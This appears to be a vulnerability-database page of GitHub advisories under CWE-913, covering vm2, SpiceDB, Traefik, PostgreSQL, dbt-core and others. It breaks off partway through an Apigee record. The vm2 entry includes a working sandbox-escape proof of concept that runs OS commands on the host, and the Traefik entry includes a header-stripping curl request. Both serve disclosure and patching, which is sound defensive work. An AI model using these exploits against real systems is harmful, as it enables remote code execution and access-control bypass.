CWE-913
Allowed-with-ReviewImproper Control of Dynamically-Managed Code Resources
Abstraction: Class · Status: Incomplete
The product does not properly restrict reading from or writing to dynamically-managed code resources such as variables, objects, classes, attributes, functions, or executable instructions or statements.
159 vulnerabilities reference this CWE, most recent first.
GHSA-M25X-4J5X-R9V6
Vulnerability from github – Published: 2025-04-27 03:30 – Updated: 2025-04-27 03:30In NASA CryptoLib before 1.3.2, the key state is not checked before use, potentially leading to spacecraft hijacking.
{
"affected": [],
"aliases": [
"CVE-2025-46675"
],
"database_specific": {
"cwe_ids": [
"CWE-913"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-04-27T01:15:44Z",
"severity": "LOW"
},
"details": "In NASA CryptoLib before 1.3.2, the key state is not checked before use, potentially leading to spacecraft hijacking.",
"id": "GHSA-m25x-4j5x-r9v6",
"modified": "2025-04-27T03:30:22Z",
"published": "2025-04-27T03:30:22Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46675"
},
{
"type": "WEB",
"url": "https://github.com/nasa/CryptoLib/pull/358"
},
{
"type": "WEB",
"url": "https://github.com/nasa/CryptoLib/pull/359"
},
{
"type": "WEB",
"url": "https://github.com/nasa/CryptoLib/compare/v1.3.1...v1.3.2"
},
{
"type": "WEB",
"url": "https://securitybynature.fr/post/hacking-cryptolib"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-M4WX-M65X-GHRR
Vulnerability from github – Published: 2026-05-29 17:50 – Updated: 2026-06-12 20:52Summary
The fix for GHSA-8hg8-63c5-gwmx (CVE-2023-37903) introduced a check in nodevm.js line 263 that blocks the combination nesting: true + require: false. However, the check uses strict equality (options.require === false), which is trivially bypassed by omitting the require option entirely.
When require is not specified, options.require is undefined, not false. The strict equality check fails, so the security guard is skipped. Immediately after (line 280), the destructuring default require: requireOpts = false assigns requireOpts = false, producing the exact configuration the patch was designed to prevent.
Root Cause
// nodevm.js:263 — the security check
if (options.nesting === true && options.require === false) {
throw new VMError('...');
}
// nodevm.js:280 — the default assignment (AFTER the check)
const { require: requireOpts = false } = options;
// When options.require is undefined:
// - Line 263: undefined === false → FALSE → check skipped
// - Line 280: requireOpts = false → same as require:false
Impact
Full Remote Code Execution on the host system. An attacker running code inside a NodeVM({ nesting: true }) sandbox (without specifying require) can:
require('vm2')to get the vm2 library- Construct an inner
NodeVMwithrequire: { builtin: ['child_process'] } - Execute arbitrary OS commands via
child_process.execSync
The inner VM is completely unconstrained by the outer sandbox configuration.
Reproduction
const { NodeVM } = require('vm2');
// nesting:true, require not specified (defaults to false AFTER the check)
const nvm = new NodeVM({ nesting: true });
const result = nvm.run(`
const { NodeVM } = require('vm2');
const inner = new NodeVM({
require: { builtin: ['child_process'] }
});
module.exports = inner.run(
"module.exports = require('child_process').execSync('id').toString()",
'exploit.js'
);
`, 'exploit.js');
console.log(result); // prints host uid/gid — full RCE
Suggested Fix
// Change the check to catch both false and undefined/omitted:
if (options.nesting === true && !options.require) {
throw new VMError('...');
}
Or move the check after the destructuring default assignment:
const { require: requireOpts = false } = options;
if (options.nesting === true && !requireOpts) {
throw new VMError('...');
}
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.11.3"
},
"package": {
"ecosystem": "npm",
"name": "vm2"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.11.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-47137"
],
"database_specific": {
"cwe_ids": [
"CWE-913"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-29T17:50:22Z",
"nvd_published_at": "2026-06-12T15:16:28Z",
"severity": "CRITICAL"
},
"details": "## Summary\n\nThe fix for GHSA-8hg8-63c5-gwmx (CVE-2023-37903) introduced a check in `nodevm.js` line 263 that blocks the combination `nesting: true` + `require: false`. However, the check uses strict equality (`options.require === false`), which is trivially bypassed by omitting the `require` option entirely.\n\nWhen `require` is not specified, `options.require` is `undefined`, not `false`. The strict equality check fails, so the security guard is skipped. Immediately after (line 280), the destructuring default `require: requireOpts = false` assigns `requireOpts = false`, producing the exact configuration the patch was designed to prevent.\n\n## Root Cause\n\n```javascript\n// nodevm.js:263 \u2014 the security check\nif (options.nesting === true \u0026\u0026 options.require === false) {\n throw new VMError(\u0027...\u0027);\n}\n// nodevm.js:280 \u2014 the default assignment (AFTER the check)\nconst { require: requireOpts = false } = options;\n// When options.require is undefined:\n// - Line 263: undefined === false \u2192 FALSE \u2192 check skipped\n// - Line 280: requireOpts = false \u2192 same as require:false\n```\n\n## Impact\n\nFull Remote Code Execution on the host system. An attacker running code inside a `NodeVM({ nesting: true })` sandbox (without specifying `require`) can:\n\n1. `require(\u0027vm2\u0027)` to get the vm2 library\n2. Construct an inner `NodeVM` with `require: { builtin: [\u0027child_process\u0027] }`\n3. Execute arbitrary OS commands via `child_process.execSync`\n\nThe inner VM is completely unconstrained by the outer sandbox configuration.\n\n## Reproduction\n\n```javascript\nconst { NodeVM } = require(\u0027vm2\u0027);\n\n// nesting:true, require not specified (defaults to false AFTER the check)\nconst nvm = new NodeVM({ nesting: true });\n\nconst result = nvm.run(`\n const { NodeVM } = require(\u0027vm2\u0027);\n const inner = new NodeVM({\n require: { builtin: [\u0027child_process\u0027] }\n });\n module.exports = inner.run(\n \"module.exports = require(\u0027child_process\u0027).execSync(\u0027id\u0027).toString()\",\n \u0027exploit.js\u0027\n );\n`, \u0027exploit.js\u0027);\n\nconsole.log(result); // prints host uid/gid \u2014 full RCE\n```\n\n## Suggested Fix\n\n```javascript\n// Change the check to catch both false and undefined/omitted:\nif (options.nesting === true \u0026\u0026 !options.require) {\n throw new VMError(\u0027...\u0027);\n}\n```\n\nOr move the check after the destructuring default assignment:\n\n```javascript\nconst { require: requireOpts = false } = options;\nif (options.nesting === true \u0026\u0026 !requireOpts) {\n throw new VMError(\u0027...\u0027);\n}\n```",
"id": "GHSA-m4wx-m65x-ghrr",
"modified": "2026-06-12T20:52:53Z",
"published": "2026-05-29T17:50:22Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-m4wx-m65x-ghrr"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-47137"
},
{
"type": "WEB",
"url": "https://github.com/patriksimek/vm2/commit/01a7552add345d5a6862623884e6b79a85bf0568"
},
{
"type": "WEB",
"url": "https://github.com/patriksimek/vm2/commit/86ab819f202c3a8dad88cef5705f2e416c5188d7"
},
{
"type": "PACKAGE",
"url": "https://github.com/patriksimek/vm2"
},
{
"type": "WEB",
"url": "https://github.com/patriksimek/vm2/releases/tag/v3.11.4"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "vm2 has a CVE-2023-37903 patch bypass: nesting:true without explicit require still allows full RCE"
}
GHSA-M54H-5X5F-5M6R
Vulnerability from github – Published: 2023-06-28 22:48 – Updated: 2023-06-30 20:25Impact
Any user making a negative authorization decision based on the results of a LookupResources request with 1.22.0 is affected.
For example, using LookupResources to find a list of resources to allow access to be okay: some subjects that should have access to a resource may not. But if using LookupResources to find a list of banned resources instead, then some users that shouldn't have access may.
Generally, LookupResources is not and should not be used to gate access in this way - that's what the Check API is for. Additionally, version 1.22.0 has included a warning about this bug since its initial release.
Workarounds
Avoid using LookupResources for negative authorization decisions if using 1.22.0.
Patches
The only affected release is v1.22.0, and it is patched in v1.22.2 (there is no v1.22.1 release, though there is a git tag).
References
- https://github.com/authzed/spicedb/pull/1397
For more information
If you have any questions or comments about this advisory: * Open an issue in SpiceDB * Ask a question in the SpiceDB Discord
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/authzed/spicedb"
},
"ranges": [
{
"events": [
{
"introduced": "1.22.0"
},
{
"fixed": "1.22.2"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"1.22.0"
]
}
],
"aliases": [
"CVE-2023-35930"
],
"database_specific": {
"cwe_ids": [
"CWE-913"
],
"github_reviewed": true,
"github_reviewed_at": "2023-06-28T22:48:50Z",
"nvd_published_at": "2023-06-26T20:15:10Z",
"severity": "LOW"
},
"details": "### Impact\nAny user making a negative authorization decision based on the results of a LookupResources request with 1.22.0 is affected.\n\nFor example, using `LookupResources` to find a list of resources to allow access to be okay: some subjects that should have access to a resource may not. But if using `LookupResources` to find a list of banned resources instead, then some users that shouldn\u0027t have access may.\n\nGenerally, `LookupResources` is not and should not be used to gate access in this way - that\u0027s what the `Check` API is for. Additionally, version 1.22.0 has included a warning about this bug since its initial release.\n\n### Workarounds\nAvoid using `LookupResources` for negative authorization decisions if using `1.22.0`. \n\n### Patches\nThe only affected release is [v1.22.0](https://github.com/authzed/spicedb/releases/tag/v1.22.0), and it is patched in [v1.22.2](https://github.com/authzed/spicedb/releases/tag/v1.22.2) (there is no v1.22.1 release, though there is a git tag).\n\n### References\n- https://github.com/authzed/spicedb/pull/1397\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [SpiceDB](https://github.com/authzed/spicedb)\n* Ask a question in the [SpiceDB Discord](https://authzed.com/discord)\n",
"id": "GHSA-m54h-5x5f-5m6r",
"modified": "2023-06-30T20:25:41Z",
"published": "2023-06-28T22:48:50Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/authzed/spicedb/security/advisories/GHSA-m54h-5x5f-5m6r"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35930"
},
{
"type": "WEB",
"url": "https://github.com/authzed/spicedb/pull/1397"
},
{
"type": "PACKAGE",
"url": "https://github.com/authzed/spicedb"
},
{
"type": "WEB",
"url": "https://github.com/authzed/spicedb/releases/tag/v1.22.2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "SpiceDB\u0027s LookupResources may return partial results"
}
GHSA-M697-4V8F-55QG
Vulnerability from github – Published: 2021-08-05 17:04 – Updated: 2021-08-31 20:57Impact
There exists a potential header vulnerability in Traefik's handling of the Connection header. Active exploitation of this issue is unlikely, as it requires that a removed header would lead to a privilege escalation, however, the Traefik team has addressed this issue to prevent any potential abuse.
Details
If you have a chain of Traefik middlewares, and one of them sets a request header Important-Security-Header, then sending a request with the following Connection header will cause it to be removed before the request was sent:
curl 'https://example.com' -H "Connection: Important-Security-Header" -0
In this case, the backend does not see the request header Important-Security-Header.
Patches
Traefik v2.4.x: https://github.com/traefik/traefik/releases/tag/v2.4.13
Workarounds
No.
For more information
If you have any questions or comments about this advisory, open an issue.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/traefik/traefik/v2"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.4.13"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/traefik/traefik"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "1.7.30"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2021-32813"
],
"database_specific": {
"cwe_ids": [
"CWE-913"
],
"github_reviewed": true,
"github_reviewed_at": "2021-08-04T18:54:19Z",
"nvd_published_at": "2021-08-03T23:15:00Z",
"severity": "MODERATE"
},
"details": "# Impact\n\nThere exists a potential header vulnerability in Traefik\u0027s handling of the Connection header. Active exploitation of this issue is unlikely, as it requires that a removed header would lead to a privilege escalation, however, the Traefik team has addressed this issue to prevent any potential abuse.\n\n# Details\n\nIf you have a chain of Traefik middlewares, and one of them sets a request header `Important-Security-Header`, then sending a request with the following Connection header will cause it to be removed before the request was sent:\n\n```\ncurl \u0027https://example.com\u0027 -H \"Connection: Important-Security-Header\" -0\n```\n\nIn this case, the backend does not see the request header `Important-Security-Header`.\n\n# Patches\n\nTraefik v2.4.x: https://github.com/traefik/traefik/releases/tag/v2.4.13\n\n# Workarounds\n\nNo.\n\n# For more information\n\nIf you have any questions or comments about this advisory, [open an issue](https://github.com/traefik/traefik/issues).\n",
"id": "GHSA-m697-4v8f-55qg",
"modified": "2021-08-31T20:57:09Z",
"published": "2021-08-05T17:04:21Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/traefik/traefik/security/advisories/GHSA-m697-4v8f-55qg"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-32813"
},
{
"type": "WEB",
"url": "https://github.com/traefik/traefik/pull/8319/commits/cbaf86a93014a969b8accf39301932c17d0d73f9"
},
{
"type": "WEB",
"url": "https://github.com/traefik/traefik/releases/tag/v2.4.13"
},
{
"type": "PACKAGE",
"url": "github.com/traefik/traefik"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Header dropping in traefik"
}
GHSA-M7MV-M566-78J6
Vulnerability from github – Published: 2022-08-19 00:00 – Updated: 2022-08-20 00:00A vulnerability found in postgresql. On this security issue an attack requires permission to create non-temporary objects in at least one schema, ability to lure or wait for an administrator to create or update an affected extension in that schema, and ability to lure or wait for a victim to use the object targeted in CREATE OR REPLACE or CREATE IF NOT EXISTS. Given all three prerequisites, the attacker can run arbitrary code as the victim role, which may be a superuser. Known-affected extensions include both PostgreSQL-bundled and non-bundled extensions. PostgreSQL blocks this attack in the core server, so there's no need to modify individual extensions.
{
"affected": [],
"aliases": [
"CVE-2022-2625"
],
"database_specific": {
"cwe_ids": [
"CWE-1321",
"CWE-913",
"CWE-915"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-08-18T19:15:00Z",
"severity": "HIGH"
},
"details": "A vulnerability found in postgresql. On this security issue an attack requires permission to create non-temporary objects in at least one schema, ability to lure or wait for an administrator to create or update an affected extension in that schema, and ability to lure or wait for a victim to use the object targeted in CREATE OR REPLACE or CREATE IF NOT EXISTS. Given all three prerequisites, the attacker can run arbitrary code as the victim role, which may be a superuser. Known-affected extensions include both PostgreSQL-bundled and non-bundled extensions. PostgreSQL blocks this attack in the core server, so there\u0027s no need to modify individual extensions.",
"id": "GHSA-m7mv-m566-78j6",
"modified": "2022-08-20T00:00:39Z",
"published": "2022-08-19T00:00:20Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-2625"
},
{
"type": "WEB",
"url": "https://access.redhat.com/security/cve/CVE-2022-2625"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2113825"
},
{
"type": "WEB",
"url": "https://security.gentoo.org/glsa/202211-04"
},
{
"type": "WEB",
"url": "https://www.postgresql.org/about/news/postgresql-145-138-1212-1117-1022-and-15-beta-3-released-2496"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-M7RG-8WVQ-846V
Vulnerability from github – Published: 2021-06-07 21:49 – Updated: 2023-08-08 19:57Prototype pollution vulnerability in 'nestie' versions 0.0.0 through 1.0.0 allows an attacker to cause a denial of service and may lead to remote code execution.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "nestie"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.0.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2021-25947"
],
"database_specific": {
"cwe_ids": [
"CWE-1321",
"CWE-913"
],
"github_reviewed": true,
"github_reviewed_at": "2021-06-04T18:32:41Z",
"nvd_published_at": "2021-06-03T20:15:00Z",
"severity": "CRITICAL"
},
"details": "Prototype pollution vulnerability in \u0027nestie\u0027 versions 0.0.0 through 1.0.0 allows an attacker to cause a denial of service and may lead to remote code execution.",
"id": "GHSA-m7rg-8wvq-846v",
"modified": "2023-08-08T19:57:34Z",
"published": "2021-06-07T21:49:14Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-25947"
},
{
"type": "WEB",
"url": "https://github.com/lukeed/nestie/commit/bc80d5898d1e5e8a3d325d355eda0c325c8dcfc2"
},
{
"type": "WEB",
"url": "https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25947"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Prototype pollution in nestie"
}
GHSA-MMHJ-4W6J-76H7
Vulnerability from github – Published: 2021-04-06 17:22 – Updated: 2021-03-30 22:27Versions of isolated-vm before v4.0.0, and especially before v3.0.0, have API pitfalls which may make it easy for implementers to expose supposed secure isolates to the permissions of the main nodejs isolate.
Reference objects allow access to the underlying reference's full prototype chain. In an environment where the implementer has exposed a Reference instance to an attacker they would be able to use it to acquire a Reference to the nodejs context's Function object.
Similar application-specific attacks could be possible by modifying the local prototype of other API objects.
Access to NativeModule objects could allow an attacker to load and run native code from anywhere on the filesystem. If combined with, for example, a file upload API this would allow for arbitrary code execution.
To address these issues the following changes were made in v4.0.0:
- Documentation was updated with more explicit guidelines on building secure applications.
- Reference instances will no longer follow prototype chains by default, nor will they invoke accessors or proxies.
- All isolated-vm API prototypes are now immutable.
- NativeModule constructor may only be invoked from a nodejs isolate.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "isolated-vm"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.0.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2021-21413"
],
"database_specific": {
"cwe_ids": [
"CWE-913"
],
"github_reviewed": true,
"github_reviewed_at": "2021-03-30T22:27:45Z",
"nvd_published_at": "2021-03-30T23:15:00Z",
"severity": "HIGH"
},
"details": "Versions of `isolated-vm` before v4.0.0, and especially before v3.0.0, have API pitfalls which may make it easy for implementers to expose supposed secure isolates to the permissions of the main nodejs isolate.\n\n`Reference` objects allow access to the underlying reference\u0027s full prototype chain. In an environment where the implementer has exposed a `Reference` instance to an attacker they would be able to use it to acquire a `Reference` to the nodejs context\u0027s `Function` object.\n\nSimilar application-specific attacks could be possible by modifying the local prototype of other API objects.\n\nAccess to `NativeModule` objects could allow an attacker to load and run native code from anywhere on the filesystem. If combined with, for example, a file upload API this would allow for arbitrary code execution.\n\nTo address these issues the following changes were made in v4.0.0:\n- Documentation was updated with more explicit guidelines on building secure applications.\n- `Reference` instances will no longer follow prototype chains by default, nor will they invoke accessors or proxies.\n- All `isolated-vm` API prototypes are now immutable.\n- `NativeModule` constructor may only be invoked from a nodejs isolate.",
"id": "GHSA-mmhj-4w6j-76h7",
"modified": "2021-03-30T22:27:45Z",
"published": "2021-04-06T17:22:55Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/laverdet/isolated-vm/security/advisories/GHSA-mmhj-4w6j-76h7"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21413"
},
{
"type": "WEB",
"url": "https://github.com/laverdet/isolated-vm/commit/2646e6c1558bac66285daeab54c7d490ed332b15"
},
{
"type": "WEB",
"url": "https://github.com/laverdet/isolated-vm/commit/27151bfecc260e96714443613880e3b2e6596704"
},
{
"type": "WEB",
"url": "https://github.com/laverdet/isolated-vm/blob/main/CHANGELOG.md#v400"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Misuse of `Reference` and other transferable APIs may lead to access to nodejs isolate"
}
GHSA-MRGP-MRHC-5JRQ
Vulnerability from github – Published: 2022-09-28 13:09 – Updated: 2022-09-28 13:09Impact
A threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox.
Patches
This vulnerability was patched in the release of version 3.9.11 of vm2
Workarounds
None.
References
Github Issue - https://github.com/patriksimek/vm2/issues/467 The file that was patched - https://github.com/patriksimek/vm2/blob/master/lib/setup-sandbox.js#L71 The commit with the patch - https://github.com/patriksimek/vm2/commit/d9a7f3cc995d3d861e1380eafb886cb3c5e2b873#diff-b1a515a627d820118e76d0e323fe2f0589ed50a1eacb490f6c3278fe3698f164
For more information
If you have any questions or comments about this advisory: * Open an issue in VM2
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "vm2"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.9.11"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-36067"
],
"database_specific": {
"cwe_ids": [
"CWE-913"
],
"github_reviewed": true,
"github_reviewed_at": "2022-09-28T13:09:01Z",
"nvd_published_at": "2022-09-06T22:15:00Z",
"severity": "CRITICAL"
},
"details": "### Impact\nA threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox.\n\n### Patches\nThis vulnerability was patched in the release of version `3.9.11` of `vm2`\n\n### Workarounds\nNone. \n\n### References\nGithub Issue - https://github.com/patriksimek/vm2/issues/467\nThe file that was patched - https://github.com/patriksimek/vm2/blob/master/lib/setup-sandbox.js#L71\nThe commit with the patch - https://github.com/patriksimek/vm2/commit/d9a7f3cc995d3d861e1380eafb886cb3c5e2b873#diff-b1a515a627d820118e76d0e323fe2f0589ed50a1eacb490f6c3278fe3698f164\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [VM2](https://github.com/patriksimek/vm2)\n\n \n",
"id": "GHSA-mrgp-mrhc-5jrq",
"modified": "2022-09-28T13:09:01Z",
"published": "2022-09-28T13:09:01Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-mrgp-mrhc-5jrq"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-36067"
},
{
"type": "WEB",
"url": "https://github.com/patriksimek/vm2/issues/467"
},
{
"type": "WEB",
"url": "https://github.com/patriksimek/vm2/commit/d9a7f3cc995d3d861e1380eafb886cb3c5e2b873#diff-b1a515a627d820118e76d0e323fe2f0589ed50a1eacb490f6c3278fe3698f164"
},
{
"type": "PACKAGE",
"url": "https://github.com/patriksimek/vm2"
},
{
"type": "WEB",
"url": "https://github.com/patriksimek/vm2/blob/master/lib/setup-sandbox.js#L71"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20221017-0002"
},
{
"type": "WEB",
"url": "https://www.oxeye.io/blog/vm2-sandbreak-vulnerability-cve-2022-36067"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "vm2 vulnerable to Sandbox Escape resulting in Remote Code Execution on host"
}
GHSA-P3F3-5CCG-83XQ
Vulnerability from github – Published: 2024-07-17 15:52 – Updated: 2024-11-18 16:26Impact
What kind of vulnerability is it? Who is impacted?
When a user installs a package in dbt, it has the ability to override macros, materializations, and other core components of dbt. This is by design, as it allows packages to extend and customize dbt's functionality. However, this also means that a malicious package could potentially override these components with harmful code.
Patches
Has the problem been patched? What versions should users upgrade to?
Fixed on 1.8.0, and patched for 1.6.14 and 1.7.14 releases.
Workarounds
Is there a way for users to fix or remediate the vulnerability without upgrading?
Previously, a materialization defined in a package that shared a name with one of the built-in materializations would be preferred by default, without user action which is surprising and makes it more difficult to detect the insecure behaviour. We've changed the default behaviour to require explicit overrides by users in 1.8.0, and provided the ability to opt-out of built-in materialization overrides in 1.6 and 1.7 via the flags.require_explicit_package_overrides_for_builtin_materializations: False configuration in dbt_project.yml
Versions older than 1.6 are EOL.
References
Are there any links users can visit to find out more? * dbt documentation: https://docs.getdbt.com/reference/global-configs/legacy-behaviors#behavior-change-flags * https://www.elementary-data.com/post/are-dbt-packages-secure-the-answer-lies-in-your-dwh-policies * https://www.equalexperts.com/blog/tech-focus/are-you-at-risk-from-this-critical-dbt-vulnerability/ * https://tempered.works/posts/2024/07/06/preventing-data-theft-with-gcp-service-controls/
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "dbt-core"
},
"ranges": [
{
"events": [
{
"introduced": "1.6.0"
},
{
"fixed": "1.6.14"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "dbt-core"
},
"ranges": [
{
"events": [
{
"introduced": "1.7.0"
},
{
"fixed": "1.7.14"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-40637"
],
"database_specific": {
"cwe_ids": [
"CWE-74",
"CWE-89",
"CWE-913"
],
"github_reviewed": true,
"github_reviewed_at": "2024-07-17T15:52:57Z",
"nvd_published_at": "2024-07-16T23:15:24Z",
"severity": "LOW"
},
"details": "### Impact\n_What kind of vulnerability is it? Who is impacted?_\n\nWhen a user installs a [package](https://docs.getdbt.com/docs/build/packages) in dbt, it has the ability to override macros, materializations, and other core components of dbt. This is by design, as it allows packages to extend and customize dbt\u0027s functionality. However, this also means that a malicious package could potentially override these components with harmful code.\n\n### Patches\n_Has the problem been patched? What versions should users upgrade to?_\n\nFixed on 1.8.0, and patched for 1.6.14 and 1.7.14 releases.\n\n### Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\n\nPreviously, a materialization defined in a package that shared a name with one of the built-in materializations would be preferred by default, without user action which is surprising and makes it more difficult to detect the insecure behaviour. We\u0027ve changed the default behaviour to require explicit overrides by users in `1.8.0`, and provided the ability to opt-out of built-in materialization overrides in 1.6 and 1.7 via the `flags.require_explicit_package_overrides_for_builtin_materializations: False` configuration in `dbt_project.yml`\n\nVersions older than 1.6 are EOL.\n\n### References\n_Are there any links users can visit to find out more?_\n* dbt documentation: https://docs.getdbt.com/reference/global-configs/legacy-behaviors#behavior-change-flags\n* https://www.elementary-data.com/post/are-dbt-packages-secure-the-answer-lies-in-your-dwh-policies\n* https://www.equalexperts.com/blog/tech-focus/are-you-at-risk-from-this-critical-dbt-vulnerability/\n* https://tempered.works/posts/2024/07/06/preventing-data-theft-with-gcp-service-controls/",
"id": "GHSA-p3f3-5ccg-83xq",
"modified": "2024-11-18T16:26:52Z",
"published": "2024-07-17T15:52:57Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/dbt-labs/dbt-core/security/advisories/GHSA-p3f3-5ccg-83xq"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-40637"
},
{
"type": "WEB",
"url": "https://github.com/dbt-labs/dbt-core/commit/3c82a0296d227cb1be295356df314c11716f4ff6"
},
{
"type": "WEB",
"url": "https://github.com/dbt-labs/dbt-core/commit/87ac4deb00cc9fe334706e42a365903a1d581624"
},
{
"type": "WEB",
"url": "https://docs.getdbt.com/docs/build/packages"
},
{
"type": "WEB",
"url": "https://docs.getdbt.com/reference/global-configs/legacy-behaviors#behavior-change-flags"
},
{
"type": "PACKAGE",
"url": "https://github.com/dbt-labs/dbt-core"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/dbt-core/PYSEC-2024-66.yaml"
},
{
"type": "WEB",
"url": "https://tempered.works/posts/2024/07/06/preventing-data-theft-with-gcp-service-controls"
},
{
"type": "WEB",
"url": "https://www.elementary-data.com/post/are-dbt-packages-secure-the-answer-lies-in-your-dwh-policies"
},
{
"type": "WEB",
"url": "https://www.equalexperts.com/blog/tech-focus/are-you-at-risk-from-this-critical-dbt-vulnerability"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "dbt has an implicit override for built-in materializations from installed packages"
}
GHSA-PPCV-W2RM-62GC
Vulnerability from github – Published: 2025-12-06 00:31 – Updated: 2025-12-06 00:31A vulnerability exists in Google Apigee's JavaCallout policy https://docs.apigee.com/api-platform/reference/policies/java-callout-policy that allows for remote code execution.
It is possible for a user to write a JavaCallout that injected a malicious object into the MessageContext to execute arbitrary Java code and system commands at runtime, leading to unauthorized access to data, lateral movement within the network, and access to backend systems.
The Apigee hybrid versions below have all been updated to protect from this vulnerability: * Hybrid_1.11.2+ * Hybrid_1.12.4+ * Hybrid_1.13.3+ * Hybrid_1.14.1+ * OPDK_5202+ * OPDK_5300+
{
"affected": [],
"aliases": [
"CVE-2025-13426"
],
"database_specific": {
"cwe_ids": [
"CWE-913"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-12-05T22:15:47Z",
"severity": "HIGH"
},
"details": "A vulnerability exists in Google Apigee\u0027s JavaCallout policy https://docs.apigee.com/api-platform/reference/policies/java-callout-policy that allows for remote code execution.\n\nIt is possible for a user to write a JavaCallout that injected a malicious object into the MessageContext to execute arbitrary Java code and system commands at runtime,\u00a0leading to unauthorized access to data, lateral movement within the network, and access to backend systems.\n\nThe Apigee hybrid versions below have all been updated to protect from this vulnerability:\n * Hybrid_1.11.2+\n * Hybrid_1.12.4+\n * Hybrid_1.13.3+\n * Hybrid_1.14.1+\n * OPDK_5202+\n * OPDK_5300+",
"id": "GHSA-ppcv-w2rm-62gc",
"modified": "2025-12-06T00:31:35Z",
"published": "2025-12-06T00:31:35Z",
"references": [
{
